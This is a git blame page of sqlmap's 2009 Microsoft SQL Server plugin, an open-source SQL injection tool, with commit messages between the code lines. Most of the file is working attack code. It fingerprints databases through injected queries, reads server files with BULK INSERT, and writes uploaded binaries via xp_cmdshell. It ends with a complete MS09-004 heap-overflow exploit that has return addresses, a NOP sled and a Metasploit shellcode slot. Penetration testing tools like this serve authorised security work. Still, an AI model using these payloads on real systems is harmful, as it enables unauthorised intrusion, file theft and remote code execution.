sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-23 01:56:36 +03:00
Code Issues Packages Projects Releases Wiki Activity
aefa7ef988
sqlmap/plugins/dbms/mssqlserver.py

717 lines
25 KiB
Python
Raw Normal View History

After the storm, a restore..
2008-10-15 19:38:22 +04:00
#!/usr/bin/env python
"""
propsets..
2008-10-15 19:56:32 +04:00
$Id$
After the storm, a restore..
2008-10-15 19:38:22 +04:00
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
After the storm, a restore..
2008-10-15 19:38:22 +04:00
sqlmap is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
Software Foundation version 2 of the License.
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
You should have received a copy of the GNU General Public License along
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
import os
After the storm, a restore..
2008-10-15 19:38:22 +04:00
import time
from lib.core.agent import agent
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
from lib.core.common import dataToOutFile
After the storm, a restore..
2008-10-15 19:38:22 +04:00
from lib.core.common import dataToStdout
Minor enhancement to fingerprint the back-end DBMS operating system (type, version, release, distribution, codename and service pack) by parsing the DBMS banner value when both -f and -b are provided: adapted the code and added XML files defining regular expressions for matching. Example of the -f -b output now on MySQL 5.0.67 running on latest Ubuntu: --8<-- back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2 comment injection fingerprint: MySQL 5.0.67 banner parsing fingerprint: MySQL 5.0.67 html error message fingerprint: MySQL back-end DBMS operating system: Linux Ubuntu 8.10 (Intrepid) --8<--
2008-11-16 02:41:31 +03:00
from lib.core.common import formatDBMSfp
Minor enhancement to fingerprint the web server operating system and the web application technology by parsing also HTTP response Server header. Refactor libraries and plugins that parses XML to fingerprint and show on standard output the information. Updated changelog.
2008-11-18 20:42:46 +03:00
from lib.core.common import formatFingerprint
After the storm, a restore..
2008-10-15 19:38:22 +04:00
from lib.core.common import getHtmlErrorFp
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
from lib.core.common import getRange
After the storm, a restore..
2008-10-15 19:38:22 +04:00
from lib.core.common import randomInt
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
from lib.core.common import randomStr
After the storm, a restore..
2008-10-15 19:38:22 +04:00
from lib.core.common import readInput
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
from lib.core.convert import urlencode
After the storm, a restore..
2008-10-15 19:38:22 +04:00
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.exception import sqlmapNoneDataException
from lib.core.exception import sqlmapSyntaxException
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
from lib.core.exception import sqlmapUnsupportedFeatureException
After the storm, a restore..
2008-10-15 19:38:22 +04:00
from lib.core.session import setDbms
from lib.core.settings import MSSQL_ALIASES
Minor code restyling
2008-10-26 20:00:07 +03:00
from lib.core.settings import MSSQL_SYSTEM_DBS
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
from lib.core.shell import autoCompletion
After the storm, a restore..
2008-10-15 19:38:22 +04:00
from lib.core.unescaper import unescaper
from lib.request import inject
from lib.request.connect import Connect as Request
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
from lib.techniques.outband.stacked import stackedTest
After the storm, a restore..
2008-10-15 19:38:22 +04:00
from plugins.generic.enumeration import Enumeration
from plugins.generic.filesystem import Filesystem
from plugins.generic.fingerprint import Fingerprint
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
from plugins.generic.misc import Miscellaneous
After the storm, a restore..
2008-10-15 19:38:22 +04:00
from plugins.generic.takeover import Takeover
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
After the storm, a restore..
2008-10-15 19:38:22 +04:00
"""
This class defines Microsoft SQL Server methods
"""
def __init__(self):
Minor code restyling
2008-10-26 20:00:07 +03:00
self.excludeDbsList = MSSQL_SYSTEM_DBS
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
After the storm, a restore..
2008-10-15 19:38:22 +04:00
Enumeration.__init__(self, "Microsoft SQL Server")
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
Filesystem.__init__(self)
Takeover.__init__(self)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
unescaper.setUnescape(MSSQLServerMap.unescape)
@staticmethod
Major bug fix so that the users' privileges enumeration now works properly also on both MySQL < 5.0 and MySQL >= 5.0 also if the user has provided one or more users with -U option;
2008-11-02 21:17:12 +03:00
def unescape(expression, quote=True):
if quote:
while True:
index = expression.find("'")
if index == -1:
break
firstIndex = index + 1
index = expression[firstIndex:].find("'")
if index == -1:
raise sqlmapSyntaxException, "Unenclosed ' in '%s'" % expression
lastIndex = firstIndex + index
old = "'%s'" % expression[firstIndex:lastIndex]
#unescaped = "("
unescaped = ""
for i in range(firstIndex, lastIndex):
unescaped += "CHAR(%d)" % (ord(expression[i]))
if i < lastIndex - 1:
unescaped += "+"
#unescaped += ")"
expression = expression.replace(old, unescaped)
else:
expression = "+".join("CHAR(%d)" % ord(c) for c in expression)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
return expression
@staticmethod
def escape(expression):
while True:
index = expression.find("CHAR(")
if index == -1:
break
firstIndex = index
index = expression[firstIndex:].find("))")
if index == -1:
raise sqlmapSyntaxException, "Unenclosed ) in '%s'" % expression
lastIndex = firstIndex + index + 1
old = expression[firstIndex:lastIndex]
oldUpper = old.upper()
oldUpper = oldUpper.replace("CHAR(", "").replace(")", "")
oldUpper = oldUpper.split("+")
escaped = "'%s'" % "".join([chr(int(char)) for char in oldUpper])
expression = expression.replace(old, escaped)
return expression
def getFingerprint(self):
Minor enhancement to fingerprint the web server operating system and the web application technology by parsing also HTTP response Server header. Refactor libraries and plugins that parses XML to fingerprint and show on standard output the information. Updated changelog.
2008-11-18 20:42:46 +03:00
value = ""
wsOsFp = formatFingerprint("web server", kb.headersFp)
if wsOsFp:
value += "%s\n" % wsOsFp
Minor enhancement to show the DBMS operating system (if fingerprinted) also when only -b option is provided since it's an information that sqlmap get parsing the DBMS banner. Got rid completely of useless passive fuzzing.
2008-11-17 14:22:03 +03:00
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
if kb.data.banner:
Minor enhancement to fingerprint the web server operating system and the web application technology by parsing also HTTP response Server header. Refactor libraries and plugins that parses XML to fingerprint and show on standard output the information. Updated changelog.
2008-11-18 20:42:46 +03:00
dbmsOsFp = formatFingerprint("back-end DBMS", kb.bannerFp)
Minor enhancement to show the DBMS operating system (if fingerprinted) also when only -b option is provided since it's an information that sqlmap get parsing the DBMS banner. Got rid completely of useless passive fuzzing.
2008-11-17 14:22:03 +03:00
Minor enhancement to fingerprint the web server operating system and the web application technology by parsing also HTTP response Server header. Refactor libraries and plugins that parses XML to fingerprint and show on standard output the information. Updated changelog.
2008-11-18 20:42:46 +03:00
if dbmsOsFp:
value += "%s\n" % dbmsOsFp
Minor enhancement to show the DBMS operating system (if fingerprinted) also when only -b option is provided since it's an information that sqlmap get parsing the DBMS banner. Got rid completely of useless passive fuzzing.
2008-11-17 14:22:03 +03:00
value += "back-end DBMS: "
actVer = formatDBMSfp()
After the storm, a restore..
2008-10-15 19:38:22 +04:00
if not conf.extensiveFp:
Minor layout adjustments, minor fixes and updated changelog
2008-11-17 03:00:54 +03:00
value += actVer
return value
After the storm, a restore..
2008-10-15 19:38:22 +04:00
Minor layout adjustments, minor fixes and updated changelog
2008-11-17 03:00:54 +03:00
blank = " " * 15
value += "active fingerprint: %s" % actVer
After the storm, a restore..
2008-10-15 19:38:22 +04:00
Major enhancement to the engine to parse XML files and matches on DBMS banner and HTTP response headers. Initial web application technology fingerprint (for the moment based only on X-Powered-By HTTP response header and not shown yet to the user). Minor layout adjustments.
2008-11-17 20:41:02 +03:00
if kb.bannerFp:
release = kb.bannerFp["dbmsRelease"]
version = kb.bannerFp["dbmsVersion"]
servicepack = kb.bannerFp["dbmsServicePack"]
After the storm, a restore..
2008-10-15 19:38:22 +04:00
if release and version and servicepack:
banVer = "Microsoft SQL Server %s " % release
banVer += "Service Pack %s " % servicepack
banVer += "version %s" % version
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
Minor layout adjustments, minor fixes and updated changelog
2008-11-17 03:00:54 +03:00
htmlErrorFp = getHtmlErrorFp()
After the storm, a restore..
2008-10-15 19:38:22 +04:00
Minor layout adjustments, minor fixes and updated changelog
2008-11-17 03:00:54 +03:00
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
return value
def checkDbms(self):
if conf.dbms in MSSQL_ALIASES and kb.dbmsVersion and kb.dbmsVersion[0].isdigit():
setDbms("Microsoft SQL Server %s" % kb.dbmsVersion[0])
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
self.getBanner()
Minor enhancement to show the DBMS operating system (if fingerprinted) also when only -b option is provided since it's an information that sqlmap get parsing the DBMS banner. Got rid completely of useless passive fuzzing.
2008-11-17 14:22:03 +03:00
After the storm, a restore..
2008-10-15 19:38:22 +04:00
if not conf.extensiveFp:
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
kb.os = "Windows"
After the storm, a restore..
2008-10-15 19:38:22 +04:00
return True
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
infoMsg = "testing Microsoft SQL Server"
logger.info(infoMsg)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
Minor layout adjustment
2008-12-23 02:34:22 +03:00
payload = agent.fullPayload(" AND LEN(@@VERSION)=LEN(@@VERSION)")
Major speed increase in DBMS basic fingerprint
2008-12-23 02:26:44 +03:00
result = Request.queryPage(payload)
if result == True:
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
infoMsg = "confirming Microsoft SQL Server"
logger.info(infoMsg)
Better fingerprint technique for Microsoft SQL Server
2008-12-23 02:32:43 +03:00
Major speed increase in DBMS basic fingerprint
2008-12-23 02:26:44 +03:00
for version in ( 0, 5, 8 ):
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
payload = agent.fullPayload(" AND SUBSTRING((@@VERSION), 22, 1)=2 AND SUBSTRING((@@VERSION), 25, 1)=%d" % version)
Major speed increase in DBMS basic fingerprint
2008-12-23 02:26:44 +03:00
result = Request.queryPage(payload)
if result == True:
if version == 8:
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
kb.dbmsVersion = [ "2008" ]
break
Major speed increase in DBMS basic fingerprint
2008-12-23 02:26:44 +03:00
elif version == 5:
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
kb.dbmsVersion = [ "2005" ]
Major speed increase in DBMS basic fingerprint
2008-12-23 02:26:44 +03:00
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
break
else:
payload = agent.fullPayload(" AND SUBSTRING((@@VERSION), 22, 1)=7")
result = Request.queryPage(payload)
if result == True:
kb.dbmsVersion = [ "7.0" ]
break
After the storm, a restore..
2008-10-15 19:38:22 +04:00
if kb.dbmsVersion:
setDbms("Microsoft SQL Server %s" % kb.dbmsVersion[0])
else:
setDbms("Microsoft SQL Server")
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
self.getBanner()
kb.os = "Windows"
After the storm, a restore..
2008-10-15 19:38:22 +04:00
return True
else:
warnMsg = "the back-end DMBS is not Microsoft SQL Server"
logger.warn(warnMsg)
return False
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
def checkDbmsOs(self, detailed=False):
if kb.os and kb.osVersion and kb.osSP:
return
if not kb.os:
kb.os = "Windows"
if detailed == False:
return
infoMsg = "fingerprinting the back-end DBMS operating system "
infoMsg += "version and service pack"
logger.info(infoMsg)
infoMsg = "the back-end DBMS operating system is %s" % kb.os
self.createSupportTbl(self.fileTblName, self.tblField, "varchar(1000)")
inject.goStacked("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, "@@VERSION"))
versions = {
"2003": ( "5.2", ( 2, 1 ) ),
#"2003": ( "6.0", ( 2, 1 ) ),
"2008": ( "7.0", ( 1, ) ),
"2000": ( "5.0", ( 4, 3, 2, 1 ) ),
"XP": ( "5.1", ( 2, 1 ) ),
"NT": ( "4.0", ( 6, 5, 4, 3, 2, 1 ) )
}
# Get back-end DBMS underlying operating system version
for version, data in versions.items():
query = "(SELECT LEN(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField)
query += "LIKE '%Windows NT " + data[0] + "%')>0"
query = agent.forgeCaseStatement(query)
if inject.getValue(query, charsetType=1) == "1":
kb.osVersion = version
infoMsg += " %s" % kb.osVersion
break
if not kb.osVersion:
kb.osVersion = "2003"
kb.osSP = 2
warnMsg = "unable to fingerprint the underlying operating "
warnMsg += "system version, assuming it is Windows "
warnMsg += "%s Service Pack %d" % (kb.osVersion, kb.osSP)
logger.warn(warnMsg)
self.cleanup(onlyFileTbl=True)
return
# Get back-end DBMS underlying operating system service pack
sps = versions[kb.osVersion][1]
for sp in sps:
query = "(SELECT LEN(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField)
query += "LIKE '%Service Pack " + str(sp) + "%')>0"
query = agent.forgeCaseStatement(query)
if inject.getValue(query, charsetType=1) == "1":
kb.osSP = sp
break
if not kb.osSP:
debugMsg = "assuming the operating system has no service pack"
logger.debug(debugMsg)
kb.osSP = 0
if kb.osVersion:
infoMsg += " Service Pack %d" % kb.osSP
logger.info(infoMsg)
self.cleanup(onlyFileTbl=True)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
def getPrivileges(self):
Minor layout adjustment
2008-11-15 04:10:29 +03:00
warnMsg = "on Microsoft SQL Server it is not possible to fetch "
warnMsg += "database users privileges"
After the storm, a restore..
2008-10-15 19:38:22 +04:00
logger.warn(warnMsg)
return {}
def getTables(self):
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
infoMsg = "fetching tables"
After the storm, a restore..
2008-10-15 19:38:22 +04:00
if conf.db:
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
infoMsg += " for database '%s'" % conf.db
logger.info(infoMsg)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
rootQuery = queries[kb.dbms].tables
if not conf.db:
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
if not len(kb.data.cachedDbs):
After the storm, a restore..
2008-10-15 19:38:22 +04:00
dbs = self.getDbs()
else:
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
dbs = kb.data.cachedDbs
After the storm, a restore..
2008-10-15 19:38:22 +04:00
else:
if "," in conf.db:
dbs = conf.db.split(",")
else:
dbs = [conf.db]
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
if kb.unionPosition:
After the storm, a restore..
2008-10-15 19:38:22 +04:00
for db in dbs:
if conf.excludeSysDbs and db in self.excludeDbsList:
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
infoMsg = "skipping system database '%s'" % db
logger.info(infoMsg)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
continue
query = rootQuery["inband"]["query"] % db
value = inject.getValue(query, blind=False)
if value:
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
kb.data.cachedTables[db] = value
After the storm, a restore..
2008-10-15 19:38:22 +04:00
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
if not kb.data.cachedTables:
After the storm, a restore..
2008-10-15 19:38:22 +04:00
for db in dbs:
if conf.excludeSysDbs and db in self.excludeDbsList:
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
infoMsg = "skipping system database '%s'" % db
logger.info(infoMsg)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
continue
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
infoMsg = "fetching number of tables for "
infoMsg += "database '%s'" % db
logger.info(infoMsg)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
query = rootQuery["blind"]["count"] % db
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
count = inject.getValue(query, inband=False, charsetType=2)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
Minor bug fix
2009-02-25 23:11:14 +03:00
if not count.isdigit() or not len(count) or count == "0":
After the storm, a restore..
2008-10-15 19:38:22 +04:00
warnMsg = "unable to retrieve the number of "
warnMsg += "tables for database '%s'" % db
logger.warn(warnMsg)
continue
tables = []
for index in range(int(count)):
query = rootQuery["blind"]["query"] % (db, index, db)
table = inject.getValue(query, inband=False)
tables.append(table)
if tables:
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
kb.data.cachedTables[db] = tables
After the storm, a restore..
2008-10-15 19:38:22 +04:00
else:
warnMsg = "unable to retrieve the tables "
warnMsg += "for database '%s'" % db
logger.warn(warnMsg)
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
if not kb.data.cachedTables:
After the storm, a restore..
2008-10-15 19:38:22 +04:00
errMsg = "unable to retrieve the tables for any database"
raise sqlmapNoneDataException, errMsg
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
return kb.data.cachedTables
def unionReadFile(self, rFile):
errMsg = "Microsoft SQL Server does not support file reading "
errMsg += "with UNION query SQL injection technique"
raise sqlmapUnsupportedFeatureException, errMsg
def stackedReadFile(self, rFile):
infoMsg = "fetching file: '%s'" % rFile
logger.info(infoMsg)
result = []
txtTbl = self.fileTblName
hexTbl = "%shex" % self.fileTblName
self.createSupportTbl(txtTbl, self.tblField, "text")
inject.goStacked("DROP TABLE %s" % hexTbl)
inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)"))
logger.debug("loading the content of file '%s' into support table" % rFile)
inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, rFile, randomStr(10), randomStr(10)), silent=True)
# Reference: http://support.microsoft.com/kb/104829
binToHexQuery = """
DECLARE @charset VARCHAR(16)
DECLARE @counter INT
DECLARE @hexstr VARCHAR(4096)
DECLARE @length INT
DECLARE @chunk INT
SET @charset = '0123456789ABCDEF'
SET @counter = 1
SET @hexstr = ''
SET @length = (SELECT DATALENGTH(%s) FROM %s)
SET @chunk = 1024
WHILE (@counter <= @length)
BEGIN
DECLARE @tempint INT
DECLARE @firstint INT
DECLARE @secondint INT
SET @tempint = CONVERT(INT, (SELECT ASCII(SUBSTRING(%s, @counter, 1)) FROM %s))
SET @firstint = floor(@tempint/16)
SET @secondint = @tempint - (@firstint * 16)
SET @hexstr = @hexstr + SUBSTRING(@charset, @firstint+1, 1) + SUBSTRING(@charset, @secondint+1, 1)
SET @counter = @counter + 1
IF @counter %% @chunk = 0
BEGIN
INSERT INTO %s(%s) VALUES(@hexstr)
SET @hexstr = ''
END
END
IF @counter %% (@chunk) != 0
BEGIN
INSERT INTO %s(%s) VALUES(@hexstr)
END
""" % (self.tblField, txtTbl, self.tblField, txtTbl, hexTbl, self.tblField, hexTbl, self.tblField)
binToHexQuery = binToHexQuery.replace(" ", "").replace("\n", " ")
binToHexQuery = urlencode(binToHexQuery, convall=True)
inject.goStacked(binToHexQuery)
if kb.unionPosition:
result = inject.getValue("SELECT %s FROM %s ORDER BY id ASC" % (self.tblField, hexTbl), sort=False, resumeValue=False, blind=False)
if not result:
result = []
count = inject.getValue("SELECT COUNT(%s) FROM %s" % (self.tblField, hexTbl), resumeValue=False, charsetType=2)
if not count.isdigit() or not len(count) or count == "0":
errMsg = "unable to retrieve the content of the "
errMsg += "file '%s'" % rFile
raise sqlmapNoneDataException, errMsg
indexRange = getRange(count)
for index in indexRange:
chunk = inject.getValue("SELECT TOP 1 %s FROM %s WHERE %s NOT IN (SELECT TOP %d %s FROM %s ORDER BY id ASC) ORDER BY id ASC" % (self.tblField, hexTbl, self.tblField, index, self.tblField, hexTbl), unpack=False, resumeValue=False, sort=False, charsetType=3)
result.append(chunk)
inject.goStacked("DROP TABLE %s" % hexTbl)
return result
def unionWriteFile(self, wFile, dFile, fileType, confirm=True):
errMsg = "Microsoft SQL Server does not support file upload with "
errMsg += "UNION query SQL injection technique"
raise sqlmapUnsupportedFeatureException, errMsg
def stackedWriteFile(self, wFile, dFile, fileType, confirm=True):
# NOTE: this is needed here because we use xp_cmdshell extended
# procedure to write a file on the back-end Microsoft SQL Server
# file system. Maybe it won't be required to write text files
self.initEnv()
self.getRemoteTempPath()
debugMsg = "going to use xp_cmdshell extended procedure to write "
debugMsg += "the %s file content to file '%s'" % (fileType, dFile)
logger.debug(debugMsg)
debugSize = 0xFF00
tmpPath = conf.tmpPath.replace("/", "\\")
dFileName = os.path.split(dFile)[1]
dFile = dFile.replace("/", "\\")
wFileSize = os.path.getsize(wFile)
wFilePointer = open(wFile, "rb")
wFileContent = wFilePointer.read()
wFilePointer.close()
if wFileSize < debugSize:
chunkName = self.updateBinChunk(wFileContent, dFile, tmpPath)
sFile = "%s\%s" % (tmpPath, dFileName)
logger.debug("moving binary file %s to %s" % (sFile, dFile))
commands = (
"cd %s" % tmpPath,
"ren %s %s" % (chunkName, dFileName),
"move /Y %s %s" % (dFileName, dFile)
)
complComm = " & ".join(command for command in commands)
forgedCmd = self.xpCmdshellForgeCmd(complComm)
self.execCmd(forgedCmd)
else:
infoMsg = "the %s file is bigger than %d " % (fileType, debugSize)
infoMsg += "bytes. sqlmap will split it into chunks, upload "
infoMsg += "them and recreate the original file out of the "
infoMsg += "binary chunks server-side, wait.."
logger.info(infoMsg)
counter = 1
for i in range(0, wFileSize, debugSize):
wFileChunk = wFileContent[i:i+debugSize]
chunkName = self.updateBinChunk(wFileChunk, dFile, tmpPath)
if i == 0:
infoMsg = "renaming chunk "
copyCmd = "ren %s %s" % (chunkName, dFileName)
else:
infoMsg = "appending chunk "
copyCmd = "copy /B /Y %s+%s %s" % (dFileName, chunkName, dFileName)
infoMsg += "%s\%s to %s\%s" % (tmpPath, chunkName, tmpPath, dFileName)
logger.debug(infoMsg)
commands = (
"cd %s" % tmpPath,
copyCmd,
"del /F %s" % chunkName
)
complComm = " & ".join(command for command in commands)
forgedCmd = self.xpCmdshellForgeCmd(complComm)
self.execCmd(forgedCmd)
logger.info("file chunk %d written" % counter)
counter += 1
sFile = "%s\%s" % (tmpPath, dFileName)
logger.debug("moving binary file %s to %s" % (sFile, dFile))
commands = (
"cd %s" % tmpPath,
"move /Y %s %s" % (dFileName, dFile)
)
complComm = " & ".join(command for command in commands)
forgedCmd = self.xpCmdshellForgeCmd(complComm)
self.execCmd(forgedCmd)
if confirm == True:
self.askCheckWrittenFile(wFile, dFile, fileType)
def uncPathRequest(self):
#inject.goStacked("EXEC master..xp_fileexist '%s'" % self.uncPath, silent=True)
inject.goStacked("EXEC master..xp_dirtree '%s'" % self.uncPath)
def overflowBypassDEP(self):
# TODO: use 'sc' to:
# * Get the SQL Server 'Service name' (usually MSSQLSERVER)
# * Detect the absolute SQL Server executable file path
#
# References:
# * http://www.ss64.com/nt/sc.html
# * http://www.ss64.com/nt/for_cmd.html
self.handleDep("C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe")
if self.bypassDEP == False:
return
logger.info("restarting Microsoft SQL Server, wait..")
time.sleep(15)
# TODO: use 'sc' to:
# * Warn the user that sqlmap needs to restart the SQL Server
# service, ask for confirmation
# * Stop the SQL Server service (after handling DEP)
# * Start the SQL Server service (after handling DEP)
# Another way to restart MSSQL consists of writing a bat file with
# the following text:
#
#@ECHO OFF
#NET STOP MSSQLSERVER
#NET START MSSQLSERVER
#
# Then run the following statement and wait a few seconds:
#
# exec master..xp_cmdshell 'start C:\WINDOWS\Temp\sqlmaprandom.bat'
def spHeapOverflow(self):
"""
References:
* http://www.microsoft.com/technet/security/bulletin/MS09-004.mspx
* http://support.microsoft.com/kb/959420
"""
returns = {
"2003": ( 2, "CHAR(0x77)+CHAR(0x55)+CHAR(0x87)+CHAR(0x7c)" ), # ntdll.dll: 0x7c8601bd -> 7508e877 (0x77e80857 it's a CALL ESI @ kernel32.dll)
"2000": ( 4, "CHAR(0xdc)+CHAR(0xe1)+CHAR(0xf8)+CHAR(0x7c)" ), # shell32.dll: 0x7cf8e1ec 163bf77c -> (CALL ESI @ shell32.dll)
}
retAddr = None
for version, data in returns.items():
sp = data[0]
address = data[1]
if kb.osVersion == version and kb.osSP == sp:
retAddr = address
break
if retAddr == None:
errMsg = "sqlmap can not exploit the stored procedure buffer "
errMsg += "overflow because it does not have a valid return "
errMsg += "code for the underlying operating system (Windows "
errMsg += "%s Service Pack %d" % (kb.osVersion, kb.osSP)
raise sqlmapUnsupportedFeatureException, errMsg
self.spExploit = """
DECLARE @buf NVARCHAR(4000),
@val NVARCHAR(4),
@counter INT
SET @buf = '
declare @retcode int,
@end_offset int,
@vb_buffer varbinary,
@vb_bufferlen int
exec master.dbo.sp_replwritetovarbin 347, @end_offset output, @vb_buffer output, @vb_bufferlen output,'''
SET @val = CHAR(0x41)
SET @counter = 0
WHILE @counter < 3320
BEGIN
SET @counter = @counter + 1
IF @counter = 411
BEGIN
/* Return address */
SET @buf = @buf + %s
/* Nopsled */
SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)
SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+
CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+
CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+
CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+
CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+
CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+
CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+
CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+
CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+
CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+
CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+
CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)
/* Metasploit shellcode stage 1 */
SET @buf = @buf + %s
/* Unroll the stack and return */
CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+
CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+
CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+
CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+
CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+
CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+CHAR(0x5e)+
CHAR(0xc3)
SET @counter = @counter + 302
SET @val = CHAR(0x43)
CONTINUE
END
SET @buf = @buf + @val
END
SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''
EXEC master..sp_executesql @buf
""" % (retAddr, self.shellcodeChar)
self.spExploit = self.spExploit.replace(" ", "").replace("\n", " ")
self.spExploit = urlencode(self.spExploit, convall=True)
logger.info("triggering the buffer overflow vulnerability, wait..")
inject.goStacked(self.spExploit, silent=True)
Reference in New Issue Copy Permalink